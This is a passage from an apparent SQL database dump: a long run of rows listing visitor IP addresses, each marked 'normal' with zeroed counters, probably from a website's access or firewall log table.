48.145','normal','',0,0,0,0,0,'[]'),(256,'23.230.235.95','normal','',0,0,0,0,0,'[]'),(257,'23.230.235.1','normal','',0,0,0,0,0,'[]'),(258,'23.230.235.204','normal','',0,0,0,0,0,'[]'),(259,'23.230.235.92','normal','',0,0,0,0,0,'[]'),(260,'23.230.235.222','normal','',0,0,0,0,0,'[]'),(261,'23.230.235.204','normal','',0,0,0,0,0,'[]'),(262,'23.230.235.64','normal','',0,0,0,0,0,'[]'),(263,'23.230.235.99','normal','',0,0,0,0,0,'[]'),(264,'212.227.213.151','normal','',0,0,0,0,0,'[]'),(265,'35.204.2.141','normal','',0,0,0,0,0,'[]'),(266,'66.249.66.86','normal','',0,0,0,0,0,'[]'),(267,'114.119.138.140','normal','',0,0,0,0,0,'[]'),(268,'192.99.36.126','normal','',0,0,0,0,0,'[]'),(269,'66.249.66.27','normal','',0,0,0,0,0,'[]'),(270,'66.249.66.29','normal','',0,0,0,0,0,'[]'),(271,'51.255.119.158','normal','',0,0,0,0,0,'[]'),(272,'66.249.66.25','normal','',0,0,0,0,0,'[]'),(273,'54.36.148.250','normal','',0,0,0,0,0,'[]'),(274,'23.230.235.10','normal','',0,0,0,0,0,'[]'),(275,'23.230.235.175','normal','',0,0,0,0,0,'[]'),(276,'23.230.235.219','normal','',0,0,0,0,0,'[]'),(277,'23.230.235.62','normal','',0,0,0,0,0,'[]'),(278,'23.230.235.90','normal','',0,0,0,0,0,'[]'),(279,'23.230.235.214','normal','',0,0,0,0,0,'[]'),(280,'114.119.154.41','normal','',0,0,0,0,0,'[]'),(281,'35.165.255.247','normal','',0,0,0,0,0,'[]'),(282,'35.91.217.116','normal','',0,0,0,0,0,'[]'),(283,'35.89.187.22','normal','',0,0,0,0,0,'[]'),(284,'35.91.57.101','normal','',0,0,0,0,0,'[]'),(285,'37.187.94.3','normal','',0,0,0,0,0,'[]'),(286,'71.82.53.206','normal','',0,0,0,0,0,'[]'),(287,'37.19.217.135','normal','',0,0,0,0,0,'[]'),(288,'185.203.187.98','normal','',0,0,0,0,0,'[]'),(289,'66.249.70.105','normal','',0,0,0,0,0,'[]'),(290,'34.91.135.146','normal','',0,0,0,0,0,'[]'),(291,'51.254.199.11','normal','',0,0,0,0,0,'[]'),(292,'68.42.64.223','normal','',0,0,0,0,0,'[]'),(293,'68.42.64.223','normal','',0,0,0,0,0,'[]'),(294,'68.42.64.223','normal','',0,0,0,0,0,'[]'),(295,'174.211.52.12','normal','',0,0,0,0,0,'[]'),(296,'157.55.39.229','normal','',0,0,0,0,0,'[]'),(297,'54.36.148.210','normal','',0,0,0,0,0,'[]'),(298,'34.147.13.254','normal','',0,0,0,0,0,'[]'),(299,'51.15.251.143','normal','',0,0,0,0,0,'[]'),(300,'51.15.251.143','normal','',0,0,0,0,0,'[]'),(301,'114.119.154.82','normal','',0,0,0,0,0,'[]'),(302,'54.36.148.117','normal','',0,0,0,0,0,'[]'),(303,'66.249.70.107','normal','',0,0,0,0,0,'[]'),(304,'120.41.45.194','normal','',0,0,0,0,0,'[]'),(305,'138.246.253.24','normal','',0,0,0,0,0,'[]'),(306,'64.124.8.59','normal','',0,0,0,0,0,'[]'),(307,'64.124.8.22','normal','',0,0,0,0,0,'[]'),(308,'114.119.154.186','normal','',0,0,0,0,0,'[]'),(309,'73.44.26.9','normal','',0,0,0,0,0,'[]'),(310,'54.36.148.67','normal','',0,0,0,0,0,'[]'),(311,'54.36.148.183','normal','',0,0,0,0,0,'[]'),(312,'46.183.221.34','normal','',0,0,0,0,0,'[]'),(313,'34.91.223.78','normal','',0,0,0,0,0,'[]'),(314,'34.91.223.78','normal','',0,0,0,0,0,'[]'),(315,'66.249.70.101','normal','',0,0,0,0,0,'[]'),(316,'66.249.70.127','normal','',0,0,0,0,0,'[]'),(317,'66.249.70.109','normal','',0,0,0,0,0,'[]'),(318,'114.119.154.39','normal','',0,0,0,0,0,'[]'),(319,'54.36.148.173','normal','',0,0,0,0,0,'[]'),(320,'51.142.90.255','normal','',0,0,0,0,0,'[]'),(321,'114.119.143.174','normal','',0,0,0,0,0,'[]'),(322,'185.126.66.137','normal','',0,0,0,0,0,'[]'),(323,'154.85.125.243','normal','',0,0,0,0,0,'[]'),(324,'185.164.57.126','normal','',0,0,0,0,0,'[]'),(325,'138.128.106.3','normal','',0,0,0,0,0,'[]'),(326,'192.241.116.173','normal','',0,0,0,0,0,'[]'),(327,'192.241.112.8','normal','',0,0,0,0,0,'[]'),(328,'178.128.5.109','normal','',0,0,0,0,0,'[]'),(329,'150.109.148.216','normal','',0,0,0,0,0,'[]'),(330,'51.89.47.206','normal','',0,0,0,0,0,'[]'),(331,'101.34.224.66','normal','',0,0,0,0,0,'[]'),(332,'23.96.7.148','normal','',0,0,0,0,0,'[]'),(333,'45.55.44.23','normal','',0,0,0,0,0,'[]'),(334,'175.178.125.173','normal','',0,0,0,0,0,'[]'),(335,'166.62.125.246','normal','',0,0,0,0,0,'[]'),(336,'185.122.170.184','normal','',0,0,0,0,0,'[]'),(337,'209.127.17.189','normal','',0,0,0,0,0,'[]'),(338,'64.111.120.253','normal','',0,0,0,0,0,'[]'),(339,'139.59.85.224','normal','',0,0,0,0,0,'[]'),(340,'77.88.5.85','normal','',0,0,0,0,0,'[]'),(341,'69.163.224.107','normal','',0,0,0,0,0,'[]'),(342,'173.212.212.180','normal','',0,0,0,0,0,'[]'),(343,'80.88.88.149','normal','',0,0,0,0,0,'[]'),(344,'51.38.192.91','normal','',0,0,0,0,0,'[]'),(345,'139.59.82.122','normal','',0,0,0,0,0,'[]'),(346,'103.130.218.189','normal','',0,0,0,0,0,'[]'),(347,'167.172.153.166','normal','',0,0,0,0,0,'[]'),(348,'207.46.13.230','normal','',0,0,0,0,0,'[]'),(349,'51.255.81.60','normal','',0,0,0,0,0,'[]'),(350,'93.114.185.76','normal','',0,0,0,0,0,'[]'),(351,'123.25.21.16','normal','',0,0,0,0,0,'[]'),(352,'208.67.104.167','normal','',0,0,0,0,0,'[]'),(353,'149.56.26.54','normal','',0,0,0,0,0,'[]'),(354,'81.88.52.221','normal','',0,0,0,0,0,'[]'),(355,'54.37.156.240','normal','',0,0,0,0,0,'[]'),(356,'167.172.142.236','normal','',0,0,0,0,0,'[]'),(357,'188.165.198.224','normal','',0,0,0,0,0,'[]'),(358,'142.93.41.19','normal','',0,0,0,0,0,'[]'),(359,'147.182.141.38','normal','',0,0,0,0,0,'[]'),(360,'217.21.87.243','normal','',0,0,0,0,0,'[]'),(361,'67.205.62.27','normal','',0,0,0,0,0,'[]'),(362,'188.127.231.190','normal','',0,0,0,0,0,'[]'),(363,'103.166.183.192','normal','',0,0,0,0,0,'[]'),(364,'138.68.84.97','normal','',0,0,0,0,0,'[]'),(365,'167.71.141.164','normal','',0,0,0,0,0,'[]'),(366,'143.244.140.199','normal','',0,0,0,0,0,'[]'),(367,'77.240.13.186','normal','',0,0,0,0,0,'[]'),(368,'205.185.116.25','normal','',0,0,0,0,0,'[]'),(369,'209.141.51.222','normal','',0,0,0,0,0,'[]'),(370,'64.124.8.21','normal','',0,0,0,0,0,'[]'),(371,'222.185.255.227','normal','',0,0,0,0,0,'[]'),(372,'61.147.15.67','normal','',0,0,0,0,0,'[]'),(373,'61.147.15.67','normal','',0,0,0,0,0,'[]'),(374,'61.147.15.65','normal','',0,0,0,0,0,'[]'),(375,'54.191.46.174','normal','',0,0,0,0,0,'[]'),(376,'76.72.172.164','normal','',0,0,0,0,0,'[]'),(377,'54.36.148.186','normal','',0,0,0,0,0,'[]'),(378,'20.214.187.69','normal','',0,0,0,0,0,'[]'),(379,'64.124.8.46','normal','',0,0,0,0,0,'[]'),(380,'114.119.138.147','normal','',0,0,0,0,0,'[]'),(381,'64.124.8.47','normal','',0,0,0,0,0,'[]'),(382,'209.141.36.231','normal','',0,0,0,0,0,'[]'),(383,'20.115.24.20','normal','',0,0,0,0,0,'[]'),(384,'205.185.122.184','normal','',0,0,0,0,0,'[]'),(385,'20.65.11.254','normal','',0,0,0,0,0,'[]'),(386,'35.89.70.123','normal','',0,0,0,0,0,'[]'),(387,'54.188.184.230','normal','',0,0,0,0,0,'[]'),(388,'54.244.188.96','normal','',0,0,0,0,0,'[]'),(389,'20.168.33.9','normal','',0,0,0,0,0,'[]'),(390,'135.181.74.243','normal','',0,0,0,0,0,'[]'),(391,'18.218.217.252','normal','',0,0,0,0,0,'[]'),(392,'64.124.8.38','normal','',0,0,0,0,0,'[]'),(393,'152.89.196.13','normal','',0,0,0,0,0,'[]'),(394,'66.249.72.169','normal','',0,0,0,0,0,'[]'),(395,'188.74.168.138','normal','',0,0,0,0,0,'[]'),(396,'92.220.10.100','normal','',0,0,0,0,0,'[]'),(397,'66.249.72.173','normal','',0,0,0,0,0,'[]'),(398,'34.122.212.181','normal','',0,0,0,0,0,'[]'),(399,'23.227.72.144','normal','',0,0,0,0,0,'[]'),(400,'35.217.23.45','normal','',0,0,0,0,0,'[]'),(401,'35.217.23.45','normal','',0,0,0,0,0,'[]'),(402,'20.204.120.185','normal','',0,0,0,0,0,'[]'),(403,'124.223.193.173','normal','',0,0,0,0,0,'[]'),(404,'66.249.72.171','normal','',0,0,0,0,0,'[]'),(405,'107.122.241.133','normal','',0,0,0,0,0,'[]'),(406,'47.50.113.114','normal','',0,0,0,0,0,'[]'),(407,'185.191.171.18','normal','',0,0,0,0,0,'[]'),(408,'54.36.148.114','normal','',0,0,0,0,0,'[]'),(409,'204.48.26.148','normal','',0,0,0,0,0,'[]'),(410,'54.36.148.76','normal','',0,0,0,0,0,'[]'),(411,'54.36.148.108','normal','',0,0,0,0,0,'[]'),(412,'77.75.76.165','normal','',0,0,0,0,0,'[]'),(413,'77.75.78.164','normal','',0,0,0,0,0,'[]'),(414,'77.75.76.172','normal','',0,0,0,0,0,'[]'),(415,'77.75.77.17','normal','',0,0,0,0,0,'[]'),(416,'77.75.78.166','normal','',0,0,0,0,0,'[]'),(417,'167.235.139.230','normal','',0,0,0,0,0,'[]'),(418,'77.75.77.119','normal','',0,0,0,0,0,'[]'),(419,'64.124.8.37','normal','',0,0,0,0,0,'[]'),(420,'64.124.8.37','normal','',0,0,0,0,0,'[]'),(421,'185.83.144.103','normal','',0,0,0,0,0,'[]'),(422,'185.83.144.103','normal','',0,0,0,0,0,'[]'),(423,'54.36.148.144','normal','',0,0,0,0,0,'[]'),(424,'51.222.253.20','normal','',0,0,0,0,0,'[]'),(425,'51.222.253.3','normal','',0,0,0,0,0,'[]'),(426,'64.124.8.45','normal','',0,0,0,0,0,'[]'),(427,'64.124.8.45','normal','',0,0,0,0,0,'[]'),(428,'74.208.2.178','normal','',0,0,0,0,0,'[]'),(429,'34.209.234.75','normal','',0,0,0,0,0,'[]'),(430,'18.236.239.193','normal','',0,0,0,0,0,'[]'),(431,'34.213.181.115','normal','',0,0,0,0,0,'[]'),(432,'52.37.63.222','normal','',0,0,0,0,0,'[]'),(433,'114.119.128.129','normal','',0,0,0,0,0,'[]'),(434,'74.208.2.158','normal','',0,0,0,0,0,'[]'),(435,'74.208.2.148','normal','',0,0,0,0,0,'[]'),(436,'74.208.2.138','normal','',0,0,0,0,0,'[]'),(437,'144.91.106.14','normal','',0,0,0,0,0,'[]'),(438,'167.172.231.42','normal','',0,0,0,0,0,'[]'),(439,'8.45.47.67','normal','',0,0,0,0,0,'[]'),(440,'34.222.205.43','normal','',0,0,0,0,0,'[]'),(441,'64.124.8.36','normal','',0,0,0,0,0,'[]'),(442,'64.124.8.36','normal','',0,0,0,0,0,'[]'),(443,'51.222.253.7','normal','',0,0,0,0,0,'[]'),(444,'64.124.8.33','normal','',0,0,0,0,0,'[]'),(445,'85.31.46.140','normal','',0,0,0,0,0,'[]'),(446,'77.158.232.76','normal','',0,0,0,0,0,'[]'),(447,'138.199.30.174','normal','',0,0,0,0,0,'[]'),(448,'40.77.189.251','normal','',0,0,0,0,0,'[]'),(449,'51.12.50.173','normal','',0,0,0,0,0,'[]'),(450,'114.119.153.158','normal','',0,0,0,0,0,'[]'),(451,'51.15.82.149','normal','',0,0,0,0,0,'[]'),(452,'128.14.209.250','normal','',0,0,0,0,0,'[]'),(453,'205.185.121.69','normal','',0,0,0,0,0,'[]'),(454,'93.159.230.89','normal','',0,0,0,0,0,'[]'),(455,'93.159.230.83','normal','',0,0,0,0,0,'[]'),(456,'77.74.177.119','normal','',0,0,0,0,0,'[]'),(457,'114.119.136.96','normal','',0,0,0,0,0,'[]'),(458,'35.231.128.155','normal','',0,0,0,0,0,'[]'),(459,'109.239.58.107','normal','',0,0,0,0,0,'[]'),(460,'174.211.43.165','normal','',0,0,0,0,0,'[]'),(461,'174.211.43.165','normal','',0,0,0,0,0,'[]'),(462,'174.211.43.165','normal','',0,0,0,0,0,'[]'),(463,'103.9.126.114','normal','',0,0,0,0,0,'[]'),(464,'161.156.29.33','normal','',0,0,0,0,0,'[]'),(465,'54.36.148.74','normal','',0,0,0,0,0,'[]'),(466,'20.68.164.8','normal','',0,0,0,0,0,'[]'),(467,'66.249.74.73','normal','',0,0,0,0,0,'[]'),(468,'54.36.149.94','normal','',0,0,0,0,0,'[]'),(469,'3.239.195.38','normal','',0,0,0,0,0,'[]'),(470,'46.137.239.25','normal','',0,0,0,0,0,'[]'),(471,'46.137.239.25','normal','',0,0,0,0,0,'[]'),(472,'18.206.115.11','normal','',0,0,0,0,0,'[]'),(473,'66.249.73.185','normal','',0,0,0,0,0,'[]'),(474,'146.70.76.43','normal','',0,0,0,0,0,'[]'),(475,'162.219.176.3','normal','',0,0,0,0,0,'[]'),(476,'147.78.47.249','normal','',0,0,0,0,0,'[]'),(477,'147.78.47.249','normal','',0,0,0,0,0,'[]'),(478,'35.175.102.19','normal','',0,0,0,0,0,'[]'),(479,'64.124.8.26','normal','',0,0,0,0,0,'[]'),(480,'149.202.82.11','normal','',0,0,0,0,0,'[]'),(481,'106.53.83.56','normal','',0,0,0,0,0,'[]'),(482,'77.88.5.45','normal','',0,0,0,0,0,'[]'),(483,'62.102.148.160','normal','',0,0,0,0,0,'[]'),(484,'141.98.102.187','normal','',0,0,0,0,0,'[]'),(485,'213.152.161.10','normal','',0,0,0,0,0,'[]'),(486,'66.249.73.187','normal','',0,0,0,0,0,'[]'),(487,'217.138.195.19','normal','',0,0,0,0,0,'[]'),(488,'167.172.64.96','normal','',0,0,0,0,0,'[]'),(489,'42.83.147.34','normal','',0,0,0,0,0,'[]'),(490,'64.246.165.50','normal','',0,0,0,0,0,'[]'),(491,'185.191.171.8','normal','',0,0,0,0,0,'[]'),(492,'185.191.171.8','normal','',0,0,0,0,0,'[]'),(493,'124.221.186.26','normal','',0,0,0,0,0,'[]'),(494,'124.221.186.26','normal','',0,0,0,0,0,'[]'),(495,'18.237.235.119','normal','',0,0,0,0,0,'[]'),(496,'20.163.117.192','normal','',0,0,0,0,0,'[]'),(497,'54.36.148.201','normal','',0,0,0,0,0,'[]'),(498,'205.185.116.89','normal','',0,0,0,0,0,'[]'),(499,'209.141.49.169','normal','',0,0,0,0,0,'[]'),(500,'135.181.79.106','normal','',0,0,0,0,0,'[]'),(501,'141.98.83.247','normal','',0,0,0,0,0,'[]'),(502,'65.108.0.71','normal','',0,0,0,0,0,'[]'),(503,'54.36.148.218','normal','',0,0,0,0,0,'[]'),(504,'80.76.51.29','normal','',0,0,0,0,0,'[]'),(505,'64.42.179.35','normal','',0,0,0,0,0,'[]'),(506,'89.174.150.18','normal','',0,0,0,0,0,'[]'),(507,'23.100.7.152','normal','',0,0,0,0,0,'[]'),(508,'220.181.108.81','normal','',0,0,0,0,0,'[]'),(509,'116.179.32.221','normal','',0,0,0,0,0,'[]'),(510,'116.179.33.82','normal','',0,0,0,0,0,'[]'),(511,'220.181.51.90','normal','',0,0,0,0,0,'[]'),(512,'220.181.51.120','normal','',0,0,0,0,0,'[]'),(513,'220.181.108.146','normal','',0,0,0,0,0,'[]'),(514,'116.179.37.167','normal','',0,0,0,0,0,'[]'),(515,'114.119.153.72','normal','',0,0,0,0,0,'[]'),(516,'154.6.16.250','normal','',0,0,0,0,0,'[]'),(517,'85.215.100.33','normal','',0,0,0,0,0,'[]'),(518,'124.223.193.80','normal','',0,0,0,0,0,'[]'),(519,'159.65.44.109','normal','',0,0,0,0,0,'[]'),(520,'163.172.180.25','normal','',0,0,0,0,0,'[]'),(521,'66.249.75.173','normal','',0,0,0,0,0,'[]'),(522,'62.102.148.189','normal','',0,0,0,0,0,'[]'),(523,'141.98.102.235','normal','',0,0,0,0,0,'[]'),(524,'114.119.149.232','normal','',0,0,0,0,0,'[]'),(525,'95.216.45.152','normal','',0,0,0,0,0,'[]'),(526,'173.249.30.147','normal','',0,0,0,0,0,'[]'),(527,'66.249.75.171','normal','',0,0,0,0,0,'[]'),(528,'103.136.202.121','normal','',0,0,0,0,0,'[]'),(529,'65.109.26.29','normal','',0,0,0,0,0,'[]'),(530,'130.211.59.173','normal','',0,0,0,0,0,'[]'),(531,'185.180.143.13','normal','',0,0,0,0,0,'[]'),(532,'223.240.99.104','normal','',0,0,0,0,0,'[]'),(533,'66.249.75.169','normal','',0,0,0,0,0,'[]'),(534,'150.249.214.250','normal','',0,0,0,0,0,'[]'),(535,'94.73.147.101','normal','',0,0,0,0,0,'[]'),(536,'150.249.214.253','normal','',0,0,0,0,0,'[]'),(537,'150.249.214.252','normal','',0,0,0,0,0,'[]'),(538,'137.184.193.51','normal','',0,0,0,0,0,'[]'),(539,'104.168.144.91','normal','',0,0,0,0,0,'[]'),(540,'103.152.170.96','normal','',0,0,0,0,0,'[]'),(541,'134.19.179.203','normal','',0,0,0,0,0,'[]'),(542,'54.36.148.180','normal','',0,0,0,0,0,'[]'),(543,'54.36.148.168','normal','',0,0,0,0,0,'[]'),(544,'212.192.246.137','normal','',0,0,0,0,0,'[]'),(545,'212.192.246.137','normal','',0,0,0,0,0,'[]'),(546,'61.190.16.210','normal','',0,0,0,0,0,'[]'),(547,'54.36.148.111','normal','',0,0,0,0,0,'[]'),(548,'54.36.148.64','normal','',0,0,0,0,0,'[]'),(549,'66.249.66.85','normal','',0,0,0,0,0,'[]'),(550,'213.152.187.235','normal','',0,0,0,0,0,'[]'),(551,'131.107.8.3','normal','',0,0,0,0,0,'[]'),(552,'34.147.20.43','normal','',0,0,0,0,0,'[]'),(553,'54.36.149.50','normal','',0,0,0,0,0,'[]'),(554,'34.147.115.203','normal','',0,0,0,0,0,'[]'),(555,'34.90.58.48','normal','',0,0,0,0,0,'[]'),(556,'157.245.110.251','normal','',0,0,0,0,0,'[]'),(557,'13.81.59.92','normal','',0,0,0,0,0,'[]'),(558,'213.152.161.240','normal','',0,0,0,0,0,'[]'),(559,'171.244.0.91','normal','',0,0,0,0,0,'[]'),(560,'23.97.205.210','normal','',0,0,0,0,0,'[]'),(561,'137.184.209.117','normal','',0,0,0,0,0,'[]'),(562,'61.219.43.253','normal','',0,0,0,0,0,'[]'),(563,'212.103.4.29','normal','',0,0,0,0,0,'[]'),(564,'51.178.76.51','normal','',0,0,0,0,0,'[]'),(565,'167.71.117.225','normal','',0,0,0,0,0,'[]'),(566,'35.193.197.89','normal','',0,0,0,0,0,'[]'),(567,'213.152.161.219','normal','',0,0,0,0,0,'[]'),(568,'91.249.163.48','normal','',0,0,0,0,0,'[]'),(569,'138.68.140.0','normal','',0,0,0,0,0,'[]'),(570,'51.91.151.60','normal','',0,0,0,0,0,'[]'),(571,'188.166.183.39','normal','',0,0,0,0,0,'[]'),(572,'68.183.75.82','normal','',0,0,0,0,0,'[]'),(573,'103.39.134.190','normal','',0,0,0,0,0,'[]'),(574,'114.119.148.163','normal','',0,0,0,0,0,'[]'),(575,'103.152.164.156','normal','',0,0,0,0,0,'[]'),(576,'47.107.242.103','normal','',0,0,0,0,0,'[]'),(577,'154.53.50.182','normal','',0,0,0,0,0,'[]'),(578,'145.239.30.120','normal','',0,0,0,0,0,'[]'),(579,'209.97.173.182','normal','',0,0,0,0,0,'[]'),(580,'207.154.248.39','normal','',0,0,0,0,0,'[]'),(581,'148.72.207.163','normal','',0,0,0,0,0,'[]'),(582,'184.168.125.241','normal','',0,0,0,0,0,'[]'),(583,'54.36.148.55','normal','',0,0,0,0,0,'[]'),(584,'207.46.234.202','normal','',0,0,0,0,0,'[]'),(585,'103.152.164.103','normal','',0,0,0,0,0,'[]'),(586,'185.2.4.134','normal','',0,0,0,0,0,'[]'),(587,'199.249.230.42','normal','',0,0,0,0,0,'[]'),(588,'103.153.214.231','normal','',0,0,0,0,0,'[]'),(589,'131.107.174.31','normal','',0,0,0,0,0,'[]'),(590,'165.22.109.42','normal','',0,0,0,0,0,'[]'),(591,'159.203.120.246','normal','',0,0,0,0,0,'[]'),(592,'46.4.123.139','normal','',0,0,0,0,0,'[]'),(593,'208.113.171.103','normal','',0,0,0,0,0,'[]'),(594,'54.36.148.133','normal','',0,0,0,0,0,'[]'),(595,'103.116.16.173','normal','',0,0,0,0,0,'[]'),(596,'131.107.147.46','normal','',0,0,0,0,0,'[]'),(597,'43.129.188.233','normal','',0,0,0,0,0,'[]'),(598,'35.192.104.56','normal','',0,0,0,0,0,'[]'),(599,'23.106.35.134','normal','',0,0,0,0,0,'[]'),(600,'47.242.86.9','normal','',0,0,0,0,0,'[]'),(601,'159.89.199.237','normal','',0,0,0,0,0,'[]'),(602,'35.239.48.40','normal','',0,0,0,0,0,'[]'),(603,'109.70.100.24','normal','',0,0,0,0,0,'[]'),(604,'51.91.29.218','normal','',0,0,0,0,0,'[]'),(605,'146.56.99.136','normal','',0,0,0,0,0,'[]'),(606,'46.32.228.70','normal','',0,0,0,0,0,'[]'),(607,'5.182.209.135','normal','',0,0,0,0,0,'[]'),(608,'119.18.52.177','normal','',0,0,0,0,0,'[]'),(609,'141.94.247.170','normal','',0,0,0,0,0,'[]'),(610,'51.79.242.130','normal','',0,0,0,0,0,'[]'),(611,'114.119.130.60','normal','',0,0,0,0,0,'[]'),(612,'159.223.170.181','normal','',0,0,0,0,0,'[]'),(613,'87.117.225.32','normal','',0,0,0,0,0,'[]'),(614,'87.236.20.43','normal','',0,0,0,0,0,'[]'),(615,'192.71.144.12','normal','',0,0,0,0,0,'[]'),(616,'51.159.105.232','normal','',0,0,0,0,0,'[]'),(617,'20.168.13.25','normal','',0,0,0,0,0,'[]'),(618,'103.27.63.56','normal','',0,0,0,0,0,'[]'),(619,'159.89.27.131','normal','',0,0,0,0,0,'[]'),(620,'69.163.152.12','normal','',0,0,0,0,0,'[]'),(621,'67.205.143.236','normal','',0,0,0,0,0,'[]'),(622,'37.46.128.180','normal','',0,0,0,0,0,'[]'),(623,'79.137.64.70','normal','',0,0,0,0,0,'[]'),(624,'185.252.31.179','normal','',0,0,0,0,0,'[]'),(625,'123.31.41.38','normal','',0,0,0,0,0,'[]'),(626,'148.72.214.245','normal','',0,0,0,0,0,'[]'),(627,'194.163.179.2','normal','',0,0,0,0,0,'[]'),(628,'211.78.92.164','normal','',0,0,0,0,0,'[]'),(629,'216.48.178.76','normal','',0,0,0,0,0,'[]'),(630,'162.0.224.206','normal','',0,0,0,0,0,'[]'),(631,'198.244.167.101','normal','',0,0,0,0,0,'[]'),(632,'190.169.30.54','normal','',0,0,0,0,0,'[]'),(633,'209.97.162.248','normal','',0,0,0,0,0,'[]'),(634,'81.88.52.210','normal','',0,0,0,0,0,'[]'),(635,'173.236.184.128','normal','',0,0,0,0,0,'[]'),(636,'128.199.205.115','normal','',0,0,0,0,0,'[]'),(637,'101.37.28.132','normal','',0,0,0,0,0,'[]'),(638,'84.23.63.44','normal','',0,0,0,0,0,'[]'),(639,'77.65.213.168','normal','',0,0,0,0,0,'[]'),(640,'51.77.134.89','normal','',0,0,0,0,0,'[]'),(641,'192.163.195.60','normal','',0,0,0,0,0,'[]'),(642,'178.217.190.82','normal','',0,0,0,0,0,'[]'),(643,'43.251.134.195','normal','',0,0,0,0,0,'[]'),(644,'67.222.142.146','normal','',0,0,0,0,0,'[]'),(645,'103.1.238.36','normal','',0,0,0,0,0,'[]'),(646,'51.158.108.77','normal','',0,0,0,0,0,'[]'),(647,'193.37.254.35','normal','',0,0,0,0,0,'[]'),(648,'17.121.112.68','normal','',0,0,0,0,0,'[]'),(649,'163.172.148.199','normal','',0,0,0,0,0,'[]'),(650,'143.198.67.208','normal','',0,0,0,0,0,'[]'),(651,'159.89.207.135','normal','',0,0,0,0,0,'[]'),(652,'116.62.49.96','normal','',0,0,0,0,0,'[]'),(653,'134.19.179.163','normal','',0,0,0,0,0,'[]'),(654,'216.245.215.122','normal','',0,0,0,0,0,'[]'),(655,'173.236.169.240','normal','',0,0,0,0,0,'[]'),(656,'178.62.35.35','normal','',0,0,0,0,0,'[]'),(657,'178.128.187.183','normal','',0,0,0,0,0,'[]'),(658,'110.40.244.196','normal','',0,0,0,0,0,'[]'),(659,'54.36.148.146','normal','',0,0,0,0,0,'[]'),(660,'54.36.148.214','normal','',0,0,0,0,0,'[]'),(661,'52.166.3.59','normal','',0,0,0,0,0,'[]'),(662,'18.182.135.144','normal','',0,0,0,0,0,'[]'),(663,'116.255.178.218','normal','',0,0,0,0,0,'[]'),(664,'54.36.148.68','normal','',0,0,0,0,0,'[]'),(665,'131.107.147.32','normal','',0,0,0,0,0,'[]'),(666,'161.35.52.207','normal','',0,0,0,0,0,'[]'),(667,'185.2.5.31','normal','',0,0,0,0,0,'[]'),(668,'78.128.8.8','normal','',0,0,0,0,0,'[]'),(669,'185.51.188.48','normal','',0,0,0,0,0,'[]'),(670,'103.146.202.150','normal','',0,0,0,0,0,'[]'),(671,'137.184.237.153','normal','',0,0,0,0,0,'[]'),(672,'131.107.159.211','normal','',0,0,0,0,0,'[]'),(673,'148.72.208.193','normal','',0,0,0,0,0,'[]'),(674,'93.158.161.37','normal','',0,0,0,0,0,'[]'),(675,'77.88.5.10','normal','',0,0,0,0,0,'[]'),(676,'184.95.46.58','normal','',0,0,0,0,0,'[]'),(677,'114.119.142.189','normal','',0,0,0,0,0,'[]'),(678,'45.130.104.53','normal','',0,0,0,0,0,'[]'),(679,'192.81.214.91','normal','',0,0,0,0,0,'[]'),(680,'81.70.248.169','normal','',0,0,0,0,0,'[]'),(681,'147.78.47.233','normal','',0,0,0,0,0,'[]'),(682,'131.107.159.55','normal','',0,0,0,0,0,'[]'),(683,'5.182.26.11','normal','',0,0,0,0,0,'[]'),(684,'159.89.109.117','normal','',0,0,0,0,0,'[]'),(685,'34.91.196.234','normal','',0,0,0,0,0,'[]'),(686,'91.205.175.12','normal','',0,0,0,0,0,'[]'),(687,'118.27.30.151','normal','',0,0,0,0,0,'[]'),(688,'192.198.126.240','normal','',0,0,0,0,0,'[]'),(689,'138.128.59.186','normal','',0,0,0,0,0,'[]'),(690,'35.213.170.208','normal','',0,0,0,0,0,'[]'),(691,'69.163.152.108','normal','',0,0,0,0,0,'[]'),(692,'13.81.56.65','normal','',0,0,0,0,0,'[]'),(693,'150.95.24.78','normal','',0,0,0,0,0,'[]'),(694,'64.227.183.25','normal','',0,0,0,0,0,'[]'),(695,'13.78.225.32','normal','',0,0,0,0,0,'[]'),(696,'162.215.217.77','normal','',0,0,0,0,0,'[]'),(697,'185.126.219.43','normal','',0,0,0,0,0,'[]'),(698,'103.130.212.57','normal','',0,0,0,0,0,'[]'),(699,'161.35.193.62','normal','',0,0,0,0,0,'[]'),(700,'206.189.128.226','normal','',0,0,0,0,0,'[]'),(701,'142.44.160.158','normal','',0,0,0,0,0,'[]'),(702,'198.12.254.32','normal','',0,0,0,0,0,'[]'),(703,'185.169.252.32','normal','',0,0,0,0,0,'[]'),(704,'47.96.74.105','normal','',0,0,0,0,0,'[]'),(705,'125.227.29.249','normal','',0,0,0,0,0,'[]'),(706,'20.109.101.102','normal','',0,0,0,0,0,'[]'),(707,'124.217.226.56','normal','',0,0,0,0,0,'[]'),(708,'107.190.136.2','normal','',0,0,0,0,0,'[]'),(709,'162.0.216.181','normal','',0,0,0,0,0,'[]'),(710,'171.244.201.17','normal','',0,0,0,0,0,'[]'),(711,'198.46.81.36','normal','',0,0,0,0,0,'[]'),(712,'159.89.2.220','normal','',0,0,0,0,0,'[]'),(713,'162.249.4.84','normal','',0,0,0,0,0,'[]'),(714,'151.106.35.235','normal','',0,0,0,0,0,'[]'),(715,'159.65.200.228','normal','',0,0,0,0,0,'[]'),(716,'171.244.17.110','normal','',0,0,0,0,0,'[]'),(717,'130.185.118.200','normal','',0,0,0,0,0,'[]'),(718,'134.122.5.88','normal','',0,0,0,0,0,'[]'),(719,'39.103.157.70','normal','',0,0,0,0,0,'[]'),(720,'212.16.185.37','normal','',0,0,0,0,0,'[]'),(721,'103.171.180.148','normal','',0,0,0,0,0,'[]'),(722,'103.111.30.40','normal','',0,0,0,0,0,'[]'),(723,'5.182.26.14','normal','',0,0,0,0,0,'[]'),(724,'54.36.148.121','normal','',0,0,0,0,0,'[]'),(725,'194.233.82.114','normal','',0,0,0,0,0,'[]'),(726,'198.199.122.148','normal','',0,0,0,0,0,'[]'),(727,'161.35.68.167','normal','',0,0,0,0,0,'[]'),(728,'159.203.121.12','normal','',0,0,0,0,0,'[]'),(729,'38.107.221.148','normal','',0,0,0,0,0,'[]'),(730,'54.38.73.235','normal','',0,0,0,0,0,'[]'),(731,'162.219.250.15','normal','',0,0,0,0,0,'[]'),(732,'177.52.160.32','normal','',0,0,0,0,0,'[]'),(733,'46.101.150.34','normal','',0,0,0,0,0,'[]'),(734,'161.35.105.75','normal','',0,0,0,0,0,'[]'),(735,'45.227.253.6','normal','',0,0,0,0,0,'[]'),(736,'109.234.161.93','normal','',0,0,0,0,0,'[]'),(737,'211.149.175.163','normal','',0,0,0,0,0,'[]'),(738,'207.244.251.184','normal','',0,0,0,0,0,'[]'),(739,'